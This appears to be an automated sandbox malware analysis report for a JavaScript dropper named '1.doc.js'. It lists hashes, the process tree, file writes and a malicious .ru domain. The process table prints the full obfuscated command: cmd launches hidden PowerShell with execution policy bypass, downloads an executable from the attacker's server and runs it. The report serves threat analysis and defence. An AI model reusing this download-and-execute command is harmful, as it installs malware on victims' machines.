File name: | 1.doc.js |
Full analysis: | https://app.any.run/tasks/dae0328e-0ce6-4e3f-86d3-37811e0ae5b3 |
Verdict: | Malicious activity |
Analysis date: | May 15, 2019, 08:11:57 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | 5692415AF3FB40A426C2095281A29906 |
SHA1: | 02CCC31D1698F64B0677BA26E3B47F01E59CB15F |
SHA256: | 209C993BDB9CDF5D76693DD366B8009DFBF77F5FA5C133FFE238E0700C779010 |
SSDEEP: | 192:BjTE1gxQJyqD8MMYqNucoelkvZUUlx0ZEDZJmkMtETRk12i1D:tIg+YqD8MMYqNucoeuvZUSxxb50ETRkb |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2824 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\1.doc.js" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2372 | "C:\Windows\System32\cmd.exe" /c GVFvaSKAOioUsCq & p^owEr^she^lL.e^Xe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://guebipk-mvd.ru/readx.exe','%temp%mHL50.exe'); & start %temp%mHL50.exe & lOGhnagwKPuoHDC | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2920 | powErshelL.eXe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://guebipk-mvd.ru/readx.exe','C:\Users\admin\AppData\Local\TempmHL50.exe'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2920 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6NPCTFHAVF76LJYFO6MA.temp | — | |
MD5:— | SHA256:— | |||
2920 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF120edd.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2920 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B |
Domain | IP | Reputation |
---|---|---|
guebipk-mvd.ru |
| malicious |
dns.msftncsi.com |
| shared |